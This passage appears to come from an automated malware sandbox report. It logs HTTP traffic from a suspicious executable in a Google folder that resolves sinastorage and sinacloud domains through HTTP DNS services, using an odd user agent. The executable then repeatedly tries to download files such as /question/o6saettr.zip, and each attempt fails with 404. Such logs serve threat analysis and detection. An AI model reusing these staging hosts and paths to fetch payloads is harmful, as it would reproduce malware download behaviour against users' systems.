                                                                                Dec 5, 2024 14:26:39.492655039 CET114INHTTP/1.1 200 OK
                                                                                Connection: close
                                                                                Server: Http Server
                                                                                Content-Type: text/html
                                                                                Content-Length: 10
                                                                                Data Raw: 34 39 2e 37 2e 33 37 2e 39 37
                                                                                Data Ascii: 49.7.37.97


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                64192.168.2.54994849.7.37.97805448C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 5, 2024 14:26:39.638016939 CET241OUTGET /question/o6saettr.zip HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                Accept-Language: zh-CN
                                                                                Accept-Encoding: gzip, deflate
                                                                                Host: sinastorage.cn
                                                                                Range: bytes=0-
                                                                                Connection: Keep-Alive
                                                                                Dec 5, 2024 14:26:41.209420919 CET532INHTTP/1.1 404 Not Found
                                                                                Server: nginx/1.6.0 r22061420-1acaf9b
                                                                                Date: Thu, 05 Dec 2024 13:26:40 GMT
                                                                                Content-Type: application/xml
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Requester: GRPS000000ANONYMOUSE
                                                                                X-RequestId: 5a8f2d5c-2412-0521-2640-6c92bfce66fe
                                                                                x-error-code: NoSuchBucket
                                                                                Data Raw: 64 65 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 6f 36 73 61 65 74 74 72 2e 7a 69 70 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 35 61 38 66 32 64 35 63 2d 32 34 31 32 2d 30 35 32 31 2d 32 36 34 30 2d 36 63 39 32 62 66 63 65 36 36 66 65 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: de<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/o6saettr.zip</Resource> <RequestId>5a8f2d5c-2412-0521-2640-6c92bfce66fe</RequestId></Error>0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                65192.168.2.54995027.221.16.149805448C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 5, 2024 14:26:41.337794065 CET240OUTGET /question/o6saettr.zip HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                Accept-Language: zh-CN
                                                                                Accept-Encoding: gzip, deflate
                                                                                Host: sinacloud.net
                                                                                Range: bytes=0-
                                                                                Connection: Keep-Alive
                                                                                Dec 5, 2024 14:26:43.119719982 CET508INHTTP/1.1 404 Not Found
                                                                                Server: nginx
                                                                                Date: Thu, 05 Dec 2024 13:26:33 GMT
                                                                                Content-Type: application/xml
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Requester: GRPS000000ANONYMOUSE
                                                                                X-RequestId: 3566a6f7-2412-0521-2642-6c92bfce68e1
                                                                                x-error-code: NoSuchBucket
                                                                                Data Raw: 64 65 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 6f 36 73 61 65 74 74 72 2e 7a 69 70 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 33 35 36 36 61 36 66 37 2d 32 34 31 32 2d 30 35 32 31 2d 32 36 34 32 2d 36 63 39 32 62 66 63 65 36 38 65 31 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: de<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/o6saettr.zip</Resource> <RequestId>3566a6f7-2412-0521-2642-6c92bfce68e1</RequestId></Error>0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                66192.168.2.54995627.221.16.179805448C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 5, 2024 14:26:43.251868963 CET240OUTGET /question/o6saettr.zip HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                Accept-Language: zh-CN
                                                                                Accept-Encoding: gzip, deflate
                                                                                Host: sinacloud.net
                                                                                Range: bytes=0-
                                                                                Connection: Keep-Alive
                                                                                Dec 5, 2024 14:26:45.080378056 CET508INHTTP/1.1 404 Not Found
                                                                                Server: nginx
                                                                                Date: Thu, 05 Dec 2024 13:26:42 GMT
                                                                                Content-Type: application/xml
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Requester: GRPS000000ANONYMOUSE
                                                                                X-RequestId: 76c330cc-2412-0521-2644-58c7acc909bc
                                                                                x-error-code: NoSuchBucket
                                                                                Data Raw: 64 65 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 6f 36 73 61 65 74 74 72 2e 7a 69 70 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 37 36 63 33 33 30 63 63 2d 32 34 31 32 2d 30 35 32 31 2d 32 36 34 34 2d 35 38 63 37 61 63 63 39 30 39 62 63 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: de<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/o6saettr.zip</Resource> <RequestId>76c330cc-2412-0521-2644-58c7acc909bc</RequestId></Error>0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                67192.168.2.549961119.29.29.29805448C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 5, 2024 14:26:45.287086010 CET79OUTGET /d?dn=sinacloud.net HTTP/1.1
                                                                                User-Agent: A2F0jleks
                                                                                Host: 119.29.29.29
                                                                                Dec 5, 2024 14:26:46.521205902 CET131INHTTP/1.1 200 OK
                                                                                Connection: close
                                                                                Server: Http Server
                                                                                Content-Type: text/html
                                                                                Content-Length: 27
                                                                                Data Raw: 32 37 2e 32 32 31 2e 31 36 2e 31 34 39 3b 32 37 2e 32 32 31 2e 31 36 2e 31 37 39
                                                                                Data Ascii: 27.221.16.149;27.221.16.179


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                68192.168.2.549962182.254.116.116805448C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 5, 2024 14:26:45.287271976 CET82OUTGET /d?dn=sinacloud.net HTTP/1.1
                                                                                User-Agent: A2F0jleks
                                                                                Host: 182.254.116.116
                                                                                Dec 5, 2024 14:26:46.864692926 CET131INHTTP/1.1 200 OK
                                                                                Connection: close
                                                                                Server: Http Server
                                                                                Content-Type: text/html
                                                                                Content-Length: 27
                                                                                Data Raw: 32 37 2e 32 32 31 2e 31 36 2e 31 37 39 3b 32 37 2e 32 32 31 2e 31 36 2e 31 34 39
                                                                                Data Ascii: 27.221.16.179;27.221.16.149


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                69192.168.2.54996727.221.16.149805448C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 5, 2024 14:26:46.647070885 CET240OUTGET /question/o6saettr.zip HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                Accept-Language: zh-CN
                                                                                Accept-Encoding: gzip, deflate
                                                                                Host: sinacloud.net
                                                                                Range: bytes=0-
                                                                                Connection: Keep-Alive
                                                                                Dec 5, 2024 14:26:48.421031952 CET508INHTTP/1.1 404 Not Found
                                                                                Server: nginx
                                                                                Date: Thu, 05 Dec 2024 13:26:39 GMT
                                                                                Content-Type: application/xml
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Requester: GRPS000000ANONYMOUSE
                                                                                X-RequestId: 3305a745-2412-0521-2647-b4055d752a45
                                                                                x-error-code: NoSuchBucket
                                                                                Data Raw: 64 65 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 6f 36 73 61 65 74 74 72 2e 7a 69 70 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 33 33 30 35 61 37 34 35 2d 32 34 31 32 2d 30 35 32 31 2d 32 36 34 37 2d 62 34 30 35 35 64 37 35 32 61 34 35 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: de<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/o6saettr.zip</Resource> <RequestId>3305a745-2412-0521-2647-b4055d752a45</RequestId></Error>0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                70192.168.2.54997327.221.16.179805448C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 5, 2024 14:26:48.547483921 CET240OUTGET /question/o6saettr.zip HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                Accept-Language: zh-CN
                                                                                Accept-Encoding: gzip, deflate
                                                                                Host: sinacloud.net
                                                                                Range: bytes=0-
                                                                                Connection: Keep-Alive
                                                                                Dec 5, 2024 14:26:50.305517912 CET508INHTTP/1.1 404 Not Found
                                                                                Server: nginx
                                                                                Date: Thu, 05 Dec 2024 13:26:47 GMT
                                                                                Content-Type: application/xml
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Requester: GRPS000000ANONYMOUSE
                                                                                X-RequestId: 54beaca1-2412-0521-2650-b4055d7078f2
                                                                                x-error-code: NoSuchBucket
                                                                                Data Raw: 64 65 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 6f 36 73 61 65 74 74 72 2e 7a 69 70 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 35 34 62 65 61 63 61 31 2d 32 34 31 32 2d 30 35 32 31 2d 32 36 35 30 2d 62 34 30 35 35 64 37 30 37 38 66 32 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: de<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/o6saettr.zip</Resource> <RequestId>54beaca1-2412-0521-2650-b4055d7078f2</RequestId></Error>0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                71192.168.2.549979123.126.45.208805448C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 5, 2024 14:26:50.957849979 CET242OUTGET /question/o6saettr.zip HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                Accept-Language: zh-CN
                                                                                Accept-Encoding: gzip, deflate
                                                                                Host: sinastorage.com
                                                                                Range: bytes=0-
                                                                                Connection: Keep-Alive
                                                                                Dec 5, 2024 14:26:52.510710001 CET532INHTTP/1.1 404 Not Found
                                                                                Server: nginx/1.6.0 r22061420-1acaf9b
                                                                                Date: Thu, 05 Dec 2024 13:26:52 GMT
                                                                                Content-Type: application/xml
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Requester: GRPS000000ANONYMOUSE
                                                                                X-RequestId: 3529120e-2412-0521-2652-6c92bfce66d4
                                                                                x-error-code: NoSuchBucket
                                                                                Data Raw: 64 65 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 6f 36 73 61 65 74 74 72 2e 7a 69 70 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 33 35 32 39 31 32 30 65 2d 32 34 31 32 2d 30 35 32 31 2d 32 36 35 32 2d 36 63 39 32 62 66 63 65 36 36 64 34 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: de<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/o6saettr.zip</Resource> <RequestId>3529120e-2412-0521-2652-6c92bfce66d4</RequestId></Error>0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                72192.168.2.549985119.29.29.29805448C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 5, 2024 14:26:52.640202045 CET81OUTGET /d?dn=sinastorage.com HTTP/1.1
                                                                                User-Agent: A2F0jleks
                                                                                Host: 119.29.29.29
                                                                                Dec 5, 2024 14:26:54.369816065 CET117INHTTP/1.1 200 OK
                                                                                Connection: close
                                                                                Server: Http Server
                                                                                Content-Type: text/html
                                                                                Content-Length: 13
                                                                                Data Raw: 31 38 33 2e 36 30 2e 39 35 2e 32 32 31
                                                                                Data Ascii: 183.60.95.221


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                73192.168.2.549986182.254.116.116805448C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 5, 2024 14:26:52.641159058 CET84OUTGET /d?dn=sinastorage.com HTTP/1.1
                                                                                User-Agent: A2F0jleks
                                                                                Host: 182.254.116.116
                                                                                Dec 5, 2024 14:26:55.637254000 CET117INHTTP/1.1 200 OK
                                                                                Connection: close
                                                                                Server: Http Server
                                                                                Content-Type: text/html
                                                                                Content-Length: 13
                                                                                Data Raw: 31 38 33 2e 36 30 2e 39 35 2e 32 32 31
                                                                                Data Ascii: 183.60.95.221


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                74192.168.2.549987114.114.114.114805448C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 5, 2024 14:26:53.152030945 CET82OUTGET /d?dn=sinacloud.net HTTP/1.1
                                                                                User-Agent: A2F0jleks
                                                                                Host: 114.114.114.114


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                75192.168.2.549989183.60.95.221805448C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 5, 2024 14:26:54.494318962 CET242OUTGET /question/o6saettr.zip HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                Accept-Language: zh-CN
                                                                                Accept-Encoding: gzip, deflate
                                                                                Host: sinastorage.com
                                                                                Range: bytes=0-
                                                                                Connection: Keep-Alive
                                                                                Dec 5, 2024 14:26:56.056746006 CET532INHTTP/1.1 404 Not Found
                                                                                Server: nginx/1.6.0 r22061420-1acaf9b
                                                                                Date: Thu, 05 Dec 2024 13:26:55 GMT
                                                                                Content-Type: application/xml
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Requester: GRPS000000ANONYMOUSE
                                                                                X-RequestId: 769b74c6-2412-0521-2655-5ca7213e02f2
                                                                                x-error-code: NoSuchBucket
                                                                                Data Raw: 64 65 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 6f 36 73 61 65 74 74 72 2e 7a 69 70 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 37 36 39 62 37 34 63 36 2d 32 34 31 32 2d 30 35 32 31 2d 32 36 35 35 2d 35 63 61 37 32 31 33 65 30 32 66 32 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: de<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/o6saettr.zip</Resource> <RequestId>769b74c6-2412-0521-2655-5ca7213e02f2</RequestId></Error>0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                76192.168.2.549995183.60.95.221805448C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 5, 2024 14:26:56.596960068 CET237OUTGET /question/c6tmassa HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                Accept-Language: zh-CN
                                                                                Accept-Encoding: gzip, deflate
                                                                                Host: sinastorage.cn
                                                                                Range: bytes=0-
                                                                                Connection: Keep-Alive
                                                                                Dec 5, 2024 14:26:58.148675919 CET528INHTTP/1.1 404 Not Found
                                                                                Server: nginx/1.6.0 r22061420-1acaf9b
                                                                                Date: Thu, 05 Dec 2024 13:26:57 GMT
                                                                                Content-Type: application/xml
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Requester: GRPS000000ANONYMOUSE
                                                                                X-RequestId: 76c540ba-2412-0521-2657-b4055d71257c
                                                                                x-error-code: NoSuchBucket
                                                                                Data Raw: 64 61 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 63 36 74 6d 61 73 73 61 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 37 36 63 35 34 30 62 61 2d 32 34 31 32 2d 30 35 32 31 2d 32 36 35 37 2d 62 34 30 35 35 64 37 31 32 35 37 63 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: da<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/c6tmassa</Resource> <RequestId>76c540ba-2412-0521-2657-b4055d71257c</RequestId></Error>0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                77192.168.2.550001182.254.116.116805448C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 5, 2024 14:26:58.286137104 CET83OUTGET /d?dn=sinastorage.cn HTTP/1.1
                                                                                User-Agent: A2F0jleks
                                                                                Host: 182.254.116.116
                                                                                Dec 5, 2024 14:26:59.906419039 CET114INHTTP/1.1 200 OK
                                                                                Connection: close
                                                                                Server: Http Server
                                                                                Content-Type: text/html
                                                                                Content-Length: 10
                                                                                Data Raw: 34 39 2e 37 2e 33 37 2e 39 37
                                                                                Data Ascii: 49.7.37.97


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                78192.168.2.550002119.29.29.29805448C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 5, 2024 14:26:58.290731907 CET80OUTGET /d?dn=sinastorage.cn HTTP/1.1
                                                                                User-Agent: A2F0jleks
                                                                                Host: 119.29.29.29
                                                                                Dec 5, 2024 14:26:59.513760090 CET114INHTTP/1.1 200 OK
                                                                                Connection: close
                                                                                Server: Http Server
                                                                                Content-Type: text/html
                                                                                Content-Length: 10
                                                                                Data Raw: 34 39 2e 37 2e 33 37 2e 39 37
                                                                                Data Ascii: 49.7.37.97


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                79192.168.2.55000749.7.37.97805448C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 5, 2024 14:26:59.698271036 CET237OUTGET /question/c6tmassa HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                Accept-Language: zh-CN
                                                                                Accept-Encoding: gzip, deflate
                                                                                Host: sinastorage.cn
                                                                                Range: bytes=0-
                                                                                Connection: Keep-Alive
                                                                                Dec 5, 2024 14:27:04.225837946 CET528INHTTP/1.1 404 Not Found
                                                                                Server: nginx/1.6.0 r22061420-1acaf9b
                                                                                Date: Thu, 05 Dec 2024 13:27:03 GMT
                                                                                Content-Type: application/xml
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Requester: GRPS000000ANONYMOUSE
                                                                                X-RequestId: 3566ca88-2412-0521-2703-6c92bfce68e1
                                                                                x-error-code: NoSuchBucket
                                                                                Data Raw: 64 61 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 63 36 74 6d 61 73 73 61 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 33 35 36 36 63 61 38 38 2d 32 34 31 32 2d 30 35 32 31 2d 32 37 30 33 2d 36 63 39 32 62 66 63 65 36 38 65 31 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: da<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/c6tmassa</Resource> <RequestId>3566ca88-2412-0521-2703-6c92bfce68e1</RequestId></Error>0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                80192.168.2.550009114.114.114.114805448C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 5, 2024 14:27:00.271812916 CET84OUTGET /d?dn=sinastorage.com HTTP/1.1
                                                                                User-Agent: A2F0jleks
                                                                                Host: 114.114.114.114


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                81192.168.2.550014114.114.114.114805448C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 5, 2024 14:27:01.517812014 CET83OUTGET /d?dn=sinastorage.cn HTTP/1.1
                                                                                User-Agent: A2F0jleks
                                                                                Host: 114.114.114.114


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                82192.168.2.550020123.126.45.208805448C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 5, 2024 14:27:04.351999998 CET238OUTGET /question/c6tmassa HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                Accept-Language: zh-CN
                                                                                Accept-Encoding: gzip, deflate
                                                                                Host: sinastorage.com
                                                                                Range: bytes=0-
                                                                                Connection: Keep-Alive
                                                                                Dec 5, 2024 14:27:05.929930925 CET528INHTTP/1.1 404 Not Found
                                                                                Server: nginx/1.6.0 r22061420-1acaf9b
                                                                                Date: Thu, 05 Dec 2024 13:27:05 GMT
                                                                                Content-Type: application/xml
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Requester: GRPS000000ANONYMOUSE
                                                                                X-RequestId: 32a9dc93-2412-0521-2705-b4055d752a1d
                                                                                x-error-code: NoSuchBucket
